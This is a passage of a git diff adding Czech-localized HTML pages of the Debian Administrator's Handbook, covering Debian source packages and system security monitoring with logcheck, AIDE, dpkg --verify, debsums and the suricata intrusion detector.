+
+iQEzBAEBCgAdFiEE1823g1EQnhJ1LsbSA4gdq+vCmrkFAlgzZXkACgkQA4gdq+vC
+mrnyXAf+M/PzZFjqk6Hvv1QSbocIDZ3bEqRjVpNLApubsPsEZZT6yw9vypzNE2hZ
+/BbLPa0Ntbhew4U+SJpuujV7VnLs9mZgOFuKRHKWYQBQ+oxw+gtM6iePwVj58aP/
+LW7K5gE428ohMdjIkf42Lz4Fve3dVPgPLIzQxRZ87N6OKqmS81M6/RRIF3TS/gJp
+CwpN1yifCfQs46gxL5/CgA4uhI8taz+g+8ZDd6fL5BQeFuNsgplY4QL1uGno3F7G
+VY7WZhM601Re2ePnv+6vjh8kDWMjZhfB4RJy0+hHezuoVGKljyaxc1O4P/fxvXus
+CEETju6cAE/HgDubDXDqExMwEd4odA==
+=HUvj
+-----END PGP SIGNATURE-----</pre></div></div><a
+            id="id-1.8.7.4.9"
+            class="indexterm"></a><div
+            class="para">
+				Note that the source package also has dependencies (<code
+              class="literal">Build-Depends</code>) completely distinct from those of binary packages, since they indicate tools required to compile the software in question and construct its binary package.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Distinct namespaces</strong></p></div></div></div><div
+              class="para">
+				It is important to note here that there is no required correspondence between the name of the source package and that of the binary package(s) that it generates. It is easy enough to understand if you know that each source package may generate several binary packages. This is why the <code
+                class="filename">.dsc</code> file has the <code
+                class="literal">Source</code> and <code
+                class="literal">Binary</code> fields to explicitly name the source package and store the list of binary packages that it generates.
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Why divide into several packages</strong></p></div></div></div><div
+              class="para">
+				Quite frequently, a source package (for a given software) can generate several binary packages. The split is justified by the possibility to use (parts of) the software in different contexts. Consider a shared library, it may be installed to make an application work (for example, <span
+                class="pkg pkg">libc6</span>), or it can be installed to develop a new program (<span
+                class="pkg pkg">libc6-dev</span> will then be the correct package). We find the same logic for client/server services where we want to install the server part on one machine and the client part on others (this is the case, for example, of <span
+                class="pkg pkg">openssh-server</span> and <span
+                class="pkg pkg">openssh-client</span>).
+			</div><div
+              class="para">
+				Just as frequently, the documentation is provided in a dedicated package: the user may install it independently from the software, and may at any time choose to remove it to save disk space. Additionally, this also saves disk space on the Debian mirrors, since the documentation package will be shared amongst all of the architectures (instead of having the documentation duplicated in the packages for each architecture).
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>PERSPECTIVE</em></span> Different source package formats</strong></p></div></div></div><div
+              class="para">
+				Originally there was only one source package format. This is the <code
+                class="literal">1.0</code> format, which associates an <code
+                class="filename">.orig.tar.gz</code> archive to a <code
+                class="filename">.diff.gz</code> “debianization” patch (there is also a variant, consisting of a single <code
+                class="filename">.tar.gz</code> archive, which is automatically used if no <code
+                class="filename">.orig.tar.gz</code> is available).
+			</div><div
+              class="para">
+				Since Debian <span
+                class="distribution distribution">Squeeze</span>, Debian developers have the option to use new formats that correct many problems of the historical format. Format <code
+                class="literal">3.0 (quilt)</code> can combine multiple upstream archives in the same source package: in addition to the usual <code
+                class="filename">.orig.tar.gz</code>, supplementary <code
+                class="filename">.orig-<em
+                  class="replaceable">component</em>.tar.gz</code> archives can be included. This is useful with software that is distributed in several upstream components but for which a single source package is desired. These archives can also be compressed with <code
+                class="command">xz</code> rather than <code
+                class="command">gzip</code>, which saves disk space and network resources. Finally, the monolithic patch, <code
+                class="filename">.diff.gz</code> is replaced by a <code
+                class="filename">.debian.tar.xz</code> archive containing the compiling instructions and a set of upstream patches contributed by the package maintainer. These last are recorded in a format compatible with <code
+                class="command">quilt</code> — a tool that facilitates the management of a series of patches.
+			</div></div><div
+            class="para">
+				The <code
+              class="filename">.orig.tar.gz</code> file is an archive containing the source code as provided by the original developer. Debian package maintainers are asked to not modify this archive in order to be able to easily check the origin and integrity of the file (by simple comparison with a checksum) and to respect the wishes of some authors.
+			</div><div
+            class="para">
+				The <code
+              class="filename">.debian.tar.xz</code> contains all of the modifications made by the Debian maintainer, especially the addition of a <code
+              class="filename">debian</code> directory containing the instructions to execute to construct a Debian package.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Decompressing a source package</strong></p></div></div></div><a
+              id="id-1.8.7.4.16.2"
+              class="indexterm"></a><a
+              id="id-1.8.7.4.16.3"
+              class="indexterm"></a><a
+              id="id-1.8.7.4.16.4"
+              class="indexterm"></a><a
+              id="id-1.8.7.4.16.5"
+              class="indexterm"></a><div
+              class="para">
+				If you have a source package, you can use the <code
+                class="command">dpkg-source</code> command (from the <span
+                class="pkg pkg">dpkg-dev</span> package) to decompress it:
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>dpkg-source -x package_0.7-1.dsc</code></strong></pre><div
+              class="para">
+				You can also use <code
+                class="command">apt-get</code> to download a source package and unpack it right away. It requires that the appropriate <code
+                class="literal">deb-src</code> lines be present in the <code
+                class="filename">/etc/apt/sources.list</code> file, however (for further details, see <a
+                class="xref"
+                href="apt.html#sect.apt-sources.list">6.1 – „Filling in the <code
+                  class="filename">sources.list</code> File“</a>). These are used to list the “sources” of source packages (meaning the servers on which a group of source packages are hosted).
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>apt-get source <em
+                    class="replaceable">package</em></code></strong></pre></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.8.7.5"></a>5.3.2. Usage within Debian</h3></div></div></div><div
+            class="para">
+				The source package is the foundation of everything in Debian. All Debian packages come from a source package, and each modification in a Debian package is the consequence of a modification made to the source package. The Debian maintainers work with the source package, knowing, however, the consequences of their actions on the binary packages. The fruits of their labors are thus found in the source packages available from Debian: you can easily go back to them and everything stems from them.
+			</div><div
+            class="para">
+				When a new version of a package (source package and one or more binary packages) arrives on the Debian server, the source package is the most important. Indeed, it will then be used by a network of machines of different architectures for compilation on the various architectures supported by Debian. The fact that the developer also sends one or more binary packages for a given architecture (usually i386 or amd64) is relatively unimportant, since these could just as well have been automatically generated.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.package-meta-information.html"><strong>Předcházející</strong>5.2. Package Meta-Information</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.manipulating-packages-with-dpkg.html"><strong>Další</strong>5.4. Manipulating Packages with dpkg</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.supervision.html b/tmp/cs-CZ/html/sect.supervision.html
new file mode 100644
index 000000000..01f499e31
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.supervision.html
@@ -0,0 +1,530 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">14.3. Supervision: Prevention, Detection, Deterrence</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Firewall, Netfilter, IDS/NIDS" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="security.html"
+        title="Kapitola 14. Security" /><link
+        rel="prev"
+        href="sect.firewall-packet-filtering.html"
+        title="14.2. Firewall or Packet Filtering" /><link
+        rel="next"
+        href="sect.apparmor.html"
+        title="14.4. Introduction to AppArmor" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.supervision.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.firewall-packet-filtering.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apparmor.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.supervision"></a>14.3. Supervision: Prevention, Detection, Deterrence</h2></div></div></div><a
+          id="id-1.17.6.2"
+          class="indexterm"></a><div
+          class="para">
+			Monitoring is an integral part of any security policy for several reasons. Among them, that the goal of security is usually not restricted to guaranteeing data confidentiality, but it also includes ensuring availability of the services. It is therefore imperative to check that everything works as expected, and to detect in a timely manner any deviant behavior or change in quality of the service(s) rendered. Monitoring activity can help detecting intrusion attempts and enable a swift reaction before they cause grave consequences. This section reviews some tools that can be used to monitor several aspects of a Debian system. As such, it completes <a
+            class="xref"
+            href="sect.monitoring.html">12.4 – „Monitoring“</a>.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.logcheck"></a>14.3.1. Monitoring Logs with <code
+                    class="command">logcheck</code></h3></div></div></div><a
+            id="id-1.17.6.4.2"
+            class="indexterm"></a><a
+            id="id-1.17.6.4.3"
+            class="indexterm"></a><a
+            id="id-1.17.6.4.4"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="command">logcheck</code> program monitors log files every hour by default. It sends unusual log messages in emails to the administrator for further analysis.
+			</div><div
+            class="para">
+				The list of monitored files is stored in <code
+              class="filename">/etc/logcheck/logcheck.logfiles</code>; the default values work fine if the <code
+              class="filename">/etc/rsyslog.conf</code> file has not been completely overhauled.
+			</div><div
+            class="para">
+				<code
+              class="command">logcheck</code> can work in one of three more or less detailed modes: <span
+              class="emphasis"><em>paranoid</em></span>, <span
+              class="emphasis"><em>server</em></span> and <span
+              class="emphasis"><em>workstation</em></span>. The first one is <span
+              class="emphasis"><em>very</em></span> verbose, and should probably be restricted to specific servers such as firewalls. The second (and default) mode is recommended for most servers. The last one is designed for workstations, and is even terser (it filters out more messages).
+			</div><div
+            class="para">
+				In all three cases, <code
+              class="command">logcheck</code> should probably be customized to exclude some extra messages (depending on installed services), unless the admin really wishes to receive hourly batches of long uninteresting emails. Since the message selection mechanism is rather complex, <code
+              class="filename">/usr/share/doc/logcheck-database/README.logcheck-database.gz</code> is a required — if challenging — read.
+			</div><div
+            class="para">
+				The applied rules can be split into several types:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						those that qualify a message as a cracking attempt (stored in a file in the <code
+                    class="filename">/etc/logcheck/cracking.d/</code> directory);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						those canceling such a qualification (<code
+                    class="filename">/etc/logcheck/cracking.ignore.d/</code>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						those classifying a message as a security alert (<code
+                    class="filename">/etc/logcheck/violations.d/</code>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						those canceling this classification (<code
+                    class="filename">/etc/logcheck/violations.ignore.d/</code>);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						finally, those applying to the remaining messages (considered as <span
+                    class="emphasis"><em>system events</em></span>).
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Ignoring a message</strong></p></div></div></div><div
+              class="para">
+				Any message tagged as a cracking attempt or a security alert (following a rule stored in a <code
+                class="filename">/etc/logcheck/violations.d/myfile</code> file) can only be ignored by a rule in a <code
+                class="filename">/etc/logcheck/violations.ignore.d/myfile</code> or <code
+                class="filename">/etc/logcheck/violations.ignore.d/myfile-<em
+                  class="replaceable">extension</em></code> file.
+			</div></div><div
+            class="para">
+				A system event is always signaled unless a rule in one of the <code
+              class="filename">/etc/logcheck/ignore.d.{paranoid,server,workstation}/</code> directories states the event should be ignored. Of course, the only directories taken into account are those corresponding to verbosity levels equal or greater than the selected operation mode.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.monitoring-activity"></a>14.3.2. Monitoring Activity</h3></div></div></div><a
+            id="id-1.17.6.5.2"
+            class="indexterm"></a><a
+            id="id-1.17.6.5.3"
+            class="indexterm"></a><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.real-time-monitoring"></a>14.3.2.1. In Real Time</h4></div></div></div><div
+              class="para">
+					<code
+                class="command">top</code> is an interactive tool that displays a list of currently running processes. The default sorting is based on the current amount of processor use and can be obtained with the <span
+                class="keycap"><strong>P</strong></span> key. Other sort orders include a sort by occupied memory (<span
+                class="keycap"><strong>M</strong></span> key), by total processor time (<span
+                class="keycap"><strong>T</strong></span> key) and by process identifier (<span
+                class="keycap"><strong>N</strong></span> key). The <span
+                class="keycap"><strong>k</strong></span> key allows killing a process by entering its process identifier. The <span
+                class="keycap"><strong>r</strong></span> key allows <span
+                class="emphasis"><em>renicing</em></span> a process, i.e. changing its priority.
+				</div><a
+              id="id-1.17.6.5.4.3"
+              class="indexterm"></a><div
+              class="para">
+					When the system seems to be overloaded, <code
+                class="command">top</code> is a great tool to see which processes are competing for processor time or consume too much memory. In particular, it is often interesting to check if the processes consuming resources match the real services that the machine is known to host. An unknown process running as the www-data user should really stand out and be investigated, since it's probably an instance of software installed and executed on the system through a vulnerability in a web application.
+				</div><div
+              class="para">
+					<code
+                class="command">top</code> is a very flexible tool and its manual page gives details on how to customize its display and adapt it to one's personal needs and habits.
+				</div><div
+              class="para">
+					The <code
+                class="command">gnome-system-monitor</code> graphical tool is similar to <code
+                class="command">top</code> and it provides roughly the same features.
+				</div><a
+              id="id-1.17.6.5.4.7"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.monitoring-history"></a>14.3.2.2. History</h4></div></div></div><a
+              id="id-1.17.6.5.5.2"
+              class="indexterm"></a><div
+              class="para">
+					Processor load, network traffic and free disk space are information that are constantly varying. Keeping a history of their evolution is often useful in determining exactly how the computer is used.
+				</div><a
+              id="id-1.17.6.5.5.4"
+              class="indexterm"></a><a
+              id="id-1.17.6.5.5.5"
+              class="indexterm"></a><div
+              class="para">
+					There are many dedicated tools for this task. Most can fetch data via SNMP (<span
+                class="emphasis"><em>Simple Network Management Protocol</em></span>) in order to centralize this information. An added benefit is that this allows fetching data from network elements that may not be general-purpose computers, such as dedicated network routers or switches.
+				</div><div
+              class="para">
+					This book deals with Munin in some detail (see <a
+                class="xref"
+                href="sect.monitoring.html#sect.munin">12.4.1 – „Setting Up Munin“</a>) as part of <a
+                class="xref"
+                href="advanced-administration.html">12: „<em>Advanced Administration</em>“</a>. Debian also provides a similar tool, <span
+                class="pkg pkg">cacti</span>. Its deployment is slightly more complex, since it is based solely on SNMP. Despite having a web interface, grasping the concepts involved in configuration still requires some effort. Reading the HTML documentation (<code
+                class="filename">/usr/share/doc/cacti/html/index.html</code>) should be considered a prerequisite.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> <code
+                          class="command">mrtg</code></strong></p></div></div></div><a
+                id="id-1.17.6.5.5.8.2"
+                class="indexterm"></a><div
+                class="para">
+					<code
+                  class="command">mrtg</code> (in the similarly-named package) is an older tool. Despite some rough edges, it can aggregate historical data and display them as graphs. It includes a number of scripts dedicated to collecting the most commonly monitored data such as processor load, network traffic, web page hits, and so on.
+				</div><div
+                class="para">
+					The <span
+                  class="pkg pkg">mrtg-contrib</span> and <span
+                  class="pkg pkg">mrtgutils</span> packages contain example scripts that can be used directly.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.17.6.6"></a>14.3.3. Detecting Changes</h3></div></div></div><div
+            class="para">
+				Once the system is installed and configured, and barring security upgrades, there's usually no reason for most of the files and directories to evolve, data excepted. It is therefore interesting to make sure that files actually do not change: any unexpected change would therefore be worth investigating. This section presents a few tools able to monitor files and to warn the administrator when an unexpected change occurs (or simply to list such changes).
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.dpkg-verify"></a>14.3.3.1. Auditing Packages with <code
+                      class="command">dpkg --verify</code></h4></div></div></div><a
+              id="id-1.17.6.6.3.2"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Protecting against upstream changes</strong></p></div></div></div><div
+                class="para">
+					<code
+                  class="command">dpkg --verify</code> is useful in detecting changes to files coming from a Debian package, but it will be useless if the package itself is compromised, for instance if the Debian mirror is compromised. Protecting against this class of attacks involves using APT's digital signature verification system (see <a
+                  class="xref"
+                  href="sect.package-authentication.html">6.5 – „Checking Package Authenticity“</a>), and taking care to only install packages from a certified origin.
+				</div></div><div
+              class="para">
+					<code
+                class="command">dpkg --verify</code> (or <code
+                class="command">dpkg -V</code>) is an interesting tool since it allows finding what installed files have been modified (potentially by an attacker), but this should be taken with a grain of salt. To do its job it relies on checksums stored in dpkg's own database which is stored on the hard disk (they can be found in <code
+                class="filename">/var/lib/dpkg/info/<em
+                  class="replaceable">package</em>.md5sums</code>); a thorough attacker will therefore update these files so they contain the new checksums for the subverted files.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> File fingerprint</strong></p></div></div></div><a
+                id="id-1.17.6.6.3.5.2"
+                class="indexterm"></a><a
+                id="id-1.17.6.6.3.5.3"
+                class="indexterm"></a><a
+                id="id-1.17.6.6.3.5.4"
+                class="indexterm"></a><a
+                id="id-1.17.6.6.3.5.5"
+                class="indexterm"></a><div
+                class="para">
+					As a reminder: a fingerprint is a value, often a number (even though in hexadecimal notation), that contains a kind of signature for the contents of a file. This signature is calculated with an algorithm (MD5 or SHA1 being well-known examples) that more or less guarantee that even the tiniest change in the file contents implies a change in the fingerprint; this is known as the “avalanche effect”. This allows a simple numerical fingerprint to serve as a litmus test to check whether the contents of a file have been altered. These algorithms are not reversible; in other words, for most of them, knowing a fingerprint doesn't allow finding the corresponding contents. Recent mathematical advances seem to weaken the absoluteness of these principles, but their use is not called into question so far, since creating different contents yielding the same fingerprint still seems to be quite a difficult task.
+				</div></div><div
+              class="para">
+					Running <code
+                class="command">dpkg -V</code> will verify all installed packages and will print out a line for each file with a failing test. The output format is the same as the one of <code
+                class="command">rpm -V</code> where each character denotes a test on some specific meta-data. Unfortunately <code
+                class="command">dpkg</code> does not store the meta-data needed for most tests and will thus output question marks for them. Currently only the checksum test can yield a "5" on the third character (when it fails).
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>dpkg -V</code></strong>
+<code
+                class="computeroutput">??5??????   /lib/systemd/system/ssh.service
+??5?????? c /etc/libvirt/qemu/networks/default.xml
+??5?????? c /etc/lvm/lvm.conf
+??5?????? c /etc/salt/roster</code></pre><div
+              class="para">
+					In the sample above, dpkg reports a change to SSH's service file that the administrator made to the packaged file instead of using an appropriate <code
+                class="filename">/etc/systemd/system/ssh.service</code> override (which would be stored below <code
+                class="filename">/etc</code> like any configuration change should be). It also lists multiple configuration files (identified by the "c" letter on the second field) that had been legitimately modified.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.debsums"></a>14.3.3.2. Auditing Packages: <code
+                      class="command">debsums</code> and its Limits</h4></div></div></div><a
+              id="id-1.17.6.6.4.2"
+              class="indexterm"></a><div
+              class="para">
+					<code
+                class="command">debsums</code> is the ancestor of <code
+                class="command">dpkg -V</code> and is thus mostly obsolete. It suffers from the same limitations than dpkg. Fortunately, some of the limitations can be worked-around (whereas dpkg does not offer similar work-arounds).
+				</div><div
+              class="para">
+					Since the data on the disk cannot be trusted, <code
+                class="command">debsums</code> offers to do its checks based on <code
+                class="filename">.deb</code> files instead of relying on dpkg's database. To download trusted <code
+                class="filename">.deb</code> files of all the packages installed, we can rely on APT's authenticated downloads. This operation can be slow and tedious, and should therefore not be considered a proactive technique to be used on a regular basis.
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>apt-get --reinstall -d install `grep-status -e 'Status: install ok installed' -n -s Package`</code></strong>
+<code
+                class="computeroutput">[ ... ]
+# </code><strong
+                class="userinput"><code>debsums -p /var/cache/apt/archives --generate=all</code></strong></pre><div
+              class="para">
+					Note that this example uses the <code
+                class="command">grep-status</code> command from the <span
+                class="pkg pkg">dctrl-tools</span> package, which is not installed by default.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.6.6.5"></a>14.3.3.3. Monitoring Files: AIDE</h4></div></div></div><a
+              id="id-1.17.6.6.5.2"
+              class="indexterm"></a><div
+              class="para">
+					The AIDE tool (<span
+                class="emphasis"><em>Advanced Intrusion Detection Environment</em></span>) allows checking file integrity, and detecting any change against a previously recorded image of the valid system. This image is stored as a database (<code
+                class="filename">/var/lib/aide/aide.db</code>) containing the relevant information on all files of the system (fingerprints, permissions, timestamps and so on). This database is first initialized with <code
+                class="command">aideinit</code>; it is then used daily (by the <code
+                class="filename">/etc/cron.daily/aide</code> script) to check that nothing relevant changed. When changes are detected, AIDE records them in log files (<code
+                class="filename">/var/log/aide/*.log</code>) and sends its findings to the administrator by email.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>IN PRACTICE</em></span> Protecting the database</strong></p></div></div></div><div
+                class="para">
+					Since AIDE uses a local database to compare the states of the files, the validity of its results is directly linked to the validity of the database. If an attacker gets root permissions on a compromised system, they will be able to replace the database and cover their tracks. A possible workaround would be to store the reference data on read-only storage media.
+				</div></div><div
+              class="para">
+					Many options in <code
+                class="filename">/etc/default/aide</code> can be used to tweak the behavior of the <span
+                class="pkg pkg">aide</span> package. The AIDE configuration proper is stored in <code
+                class="filename">/etc/aide/aide.conf</code> and <code
+                class="filename">/etc/aide/aide.conf.d/</code> (actually, these files are only used by <code
+                class="command">update-aide.conf</code> to generate <code
+                class="filename">/var/lib/aide/aide.conf.autogenerated</code>). Configuration indicates which properties of which files need to be checked. For instance, the contents of log files changes routinely, and such changes can be ignored as long as the permissions of these files stay the same, but both contents and permissions of executable programs must be constant. Although not very complex, the configuration syntax is not fully intuitive, and reading the <span
+                class="citerefentry"><span
+                  class="refentrytitle">aide.conf</span>(5)</span> manual page is therefore recommended.
+				</div><div
+              class="para">
+					A new version of the database is generated daily in <code
+                class="filename">/var/lib/aide/aide.db.new</code>; if all recorded changes were legitimate, it can be used to replace the reference database.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> Tripwire and Samhain</strong></p></div></div></div><div
+                class="para">
+					Tripwire is very similar to AIDE; even the configuration file syntax is almost the same. The main addition provided by <span
+                  class="pkg pkg">tripwire</span> is a mechanism to sign the configuration file, so that an attacker cannot make it point at a different version of the reference database.
+				</div><div
+                class="para">
+					Samhain also offers similar features, as well as some functions to help detecting rootkits (see the sidebar <a
+                  class="xref"
+                  href="sect.supervision.html#sidebar.the-checksecurity-and-chkrootkit-rkhunter-packages"><span
+                    class="emphasis"><em>QUICK LOOK</em></span> The <span
+                    class="pkg pkg">checksecurity</span> and <span
+                    class="pkg pkg">chkrootkit</span>/<span
+                    class="pkg pkg">rkhunter</span> packages</a>). It can also be deployed globally on a network, and record its traces on a central server (with a signature).
+				</div></div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.the-checksecurity-and-chkrootkit-rkhunter-packages"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>QUICK LOOK</em></span> The <span
+                          class="pkg pkg">checksecurity</span> and <span
+                          class="pkg pkg">chkrootkit</span>/<span
+                          class="pkg pkg">rkhunter</span> packages</strong></p></div></div></div><a
+                id="id-1.17.6.6.5.8.2"
+                class="indexterm"></a><div
+                class="para">
+					The first of these packages contains several small scripts performing basic checks on the system (empty passwords, new setuid files, and so on) and warning the administrator if required. Despite its explicit name, an administrator should not rely solely on it to make sure a Linux system is secure.
+				</div><div
+                class="para">
+					The <span
+                  class="pkg pkg">chkrootkit</span> and <span
+                  class="pkg pkg">rkhunter</span> packages allow looking for <span
+                  class="emphasis"><em>rootkits</em></span> potentially installed on the system. As a reminder, these are pieces of software designed to hide the compromise of a system while discreetly keeping control of the machine. The tests are not 100% reliable, but they can usually draw the administrator's attention to potential problems.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.intrusion-detection"></a>14.3.4. Detecting Intrusion (IDS/NIDS)</h3></div></div></div><a
+            id="id-1.17.6.7.2"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.3"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.4"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.5"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.6"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.7"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Denial of service</strong></p></div></div></div><a
+              id="id-1.17.6.7.8.2"
+              class="indexterm"></a><div
+              class="para">
+				A “denial of service” attack has only one goal: to make a service unavailable. Whether such an attack involves overloading the server with queries or exploiting a bug, the end result is the same: the service is no longer operational. Regular users are unhappy, and the entity hosting the targeted network service suffers a loss in reputation (and possibly in revenue, for instance if the service was an e-commerce site).
+			</div><div
+              class="para">
+				Such an attack is sometimes “distributed”; this usually involves overloading the server with large numbers of queries coming from many different sources so that the server becomes unable to answer the legitimate queries. These types of attacks have gained well-known acronyms: <acronym
+                class="acronym">DDoS</acronym> and <acronym
+                class="acronym">DoS</acronym> (depending on whether the denial of service attack is distributed or not).
+			</div></div><div
+            class="para">
+				<code
+              class="command">suricata</code> (in the Debian package of the same name) is a NIDS — a <span
+              class="emphasis"><em>Network Intrusion Detection System</em></span>. Its function is to listen to the network and try to detect infiltration attempts and/or hostile acts (including denial of service attacks). All these events are logged in multiple files in <code
+              class="filename">/var/log/suricata</code>. There are third party tools (Kibana/logstash) to better browse all the data collected. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://suricata-ids.org">http://suricata-ids.org</a></div> <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://www.elastic.co/products/kibana">https://www.elastic.co/products/kibana</a></div>
+			</div><a
+            id="id-1.17.6.7.10"
+            class="indexterm"></a><a
+            id="id-1.17.6.7.11"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Range of action</strong></p></div></div></div><div
+              class="para">
+				The effectiveness of <code
+                class="command">suricata</code> is limited by the traffic seen on the monitored network interface. It will obviously not be able to detect anything if it cannot observe the real traffic. When plugged into a network switch, it will therefore only monitor attacks targeting the machine it runs on, which is probably not the intention. The machine hosting <code
+                class="command">suricata</code> should therefore be plugged into the “mirror” port of the switch, which is usually dedicated to chaining switches and therefore gets all the traffic.
+			</div></div><div
+            class="para">
+				Configuring suricata involves reviewing and editing <code
+              class="filename">/etc/suricata/suricata-debian.yaml</code>, which is very long because each parameter is abundantly commented. A minimal configuration requires describing the range of addresses that the local network covers (<code
+              class="literal">HOME_NET</code> parameter). In practice, this means the set of all potential attack targets. But getting the most of it requires reading it in full and adapting it to the local situation.
+			</div><div
+            class="para">
+				On top of this, you should also edit <code
+              class="filename">/etc/default/suricata</code> to define the network interface to monitor and to enable the init script (by setting <code
+              class="literal">RUN=yes</code>). You might also want to set <code
+              class="literal">LISTENMODE=pcap</code> because the default <code
+              class="literal">LISTENMODE=nfqueue</code> requires further configuration to work properly (the netfilter firewall must be configured to pass packets to some user-space queue handled by suricata via the <code
+              class="literal">NFQUEUE</code> target).
+			</div><div
+            class="para">
+				To detect bad behaviour, <code
+              class="command">suricata</code> needs a set of monitoring rules: you can find such rules in the <span
+              class="pkg pkg">snort-rules-default</span> package. <code
